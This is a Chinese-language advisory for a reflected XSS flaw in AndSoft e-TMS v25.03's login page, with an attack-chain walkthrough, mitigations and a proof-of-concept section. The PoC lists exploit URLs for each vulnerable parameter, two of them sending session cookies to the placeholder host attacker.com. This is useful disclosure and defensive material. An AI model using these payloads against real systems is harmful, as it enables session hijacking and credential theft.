CVE-2025-59751：AndSoft e-TMS反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59751

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59751是AndSoft公司开发的e-TMS（电子运输管理系统）v25.03版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞于2025年10月2日由西班牙国家网络安全研究所（INCIBE）披露，CVSS 3.1评分为6.1分，属于中危级别。e-TMS是一款广泛应用于物流和运输管理领域的企业级软件，用于管理运输订单、车辆调度、物流跟踪等业务。该漏洞存在于登录页面路径'/clt/LOGINFRM_DJO.ASP'中，具体涉及'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'等多个参数。由于这些参数未经过充分的输入验证和输出编码，攻击者可以通过构造包含恶意JavaScript代码的URL，诱使受害者点击该链接，从而在受害者的浏览器上下文中执行任意JavaScript代码。此类漏洞可能导致会话劫持、敏感信息窃取、钓鱼攻击或恶意操作等安全风险，对使用e-TMS系统的企业和个人用户构成潜在威胁。

技术细节

该漏洞的根源在于AndSoft e-TMS v25.03的登录页面（/clt/LOGINFRM_DJO.ASP）对用户输入参数的过滤和编码机制存在缺陷。具体而言，页面中的'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'参数直接将用户提交的数据反射回HTTP响应中，而未对HTML特殊字符（如<、>、"、'等）进行适当的转义或编码处理。攻击者可以利用这一缺陷，在URL参数中注入恶意JavaScript代码片段（例如<script>alert(document.cookie)</script>），当受害者点击包含此类恶意参数的链接时，服务器会将恶意代码原样嵌入返回的HTML页面中，浏览器随即解析并执行该脚本。由于漏洞为反射型，恶意代码不会持久存储在服务器端，但需要在社会工程配合下诱导用户点击特制链接。由于攻击向量为网络（AV:N），无需认证（PR:N），但需要用户交互（UI:R），且影响范围为变更（Scope Changed, S:C），导致机密性和完整性受到低级别影响，但不影响可用性。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过侦察确定目标组织使用AndSoft e-TMS v25.03系统，并识别出登录页面/clt/LOGINFRM_DJO.ASP的存在及其可访问的参数。

STEP 2

步骤2：构造恶意URL

攻击者利用未经过滤的'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'或'SuppConn'参数，构造包含恶意JavaScript代码的特制URL。

STEP 3

步骤3：社会工程诱导

攻击者通过钓鱼邮件、即时消息或其他社交工程手段，将恶意URL发送给e-TMS系统的合法用户，诱使其点击该链接。

STEP 4

步骤4：触发XSS执行

受害者点击恶意链接后，浏览器向目标服务器发送请求，服务器将恶意脚本原样嵌入响应页面返回，浏览器解析并执行注入的JavaScript代码。

STEP 5

步骤5：恶意操作执行

恶意脚本在受害者浏览器上下文中执行，攻击者可以窃取会话Cookie、劫持用户会话、进行钓鱼攻击、篡改页面内容或执行其他未授权操作。

STEP 6

步骤6：数据外泄或进一步渗透

窃取的凭证或会话信息被发送到攻击者控制的服务器，攻击者可利用这些信息访问e-TMS系统中的敏感业务数据，或以此为跳板进行更深层次的渗透攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Reflected XSS PoC for CVE-2025-59751 -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_DJO.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- Exploit URL examples -->
<!-- 1. Using 'l' parameter -->
https://target.com/clt/LOGINFRM_DJO.ASP?l=<script>alert('XSS-CVE-2025-59751')</script>

<!-- 2. Using 'demo' parameter -->
https://target.com/clt/LOGINFRM_DJO.ASP?demo=<script>alert(document.cookie)</script>

<!-- 3. Using 'demo2' parameter -->
https://target.com/clt/LOGINFRM_DJO.ASP?demo2=<img src=x onerror=alert('XSS')>

<!-- 4. Using 'TNTLOGIN' parameter -->
https://target.com/clt/LOGINFRM_DJO.ASP?TNTLOGIN="><svg onload=alert(1)>

<!-- 5. Using 'UO' parameter -->
https://target.com/clt/LOGINFRM_DJO.ASP?UO=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

<!-- 6. Using 'SuppConn' parameter -->
https://target.com/clt/LOGINFRM_DJO.ASP?SuppConn=<script>alert(document.domain)</script>

<!-- Cookie stealing payload example (for demonstration only) -->
<!-- https://target.com/clt/LOGINFRM_DJO.ASP?l=<script>new Image().src="https://attacker.com/log?"+document.cookie</script> -->

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）或反向代理服务器配置规则，对/clt/LOGINFRM_DJO.ASP路径中的可疑参数进行过滤，阻止包含<script>、onerror、onload等XSS特征关键字的请求；2）在网络层面限制/clt/LOGINFRM_DJO.ASP页面的访问，仅允许可信IP地址访问；3）部署内容安全策略（CSP），限制页面中内联脚本的执行；4）加强用户安全意识培训，提醒用户不要点击来源不明的链接，尤其是包含可疑参数的URL；5）监控Web服务器日志，及时发现异常的请求模式。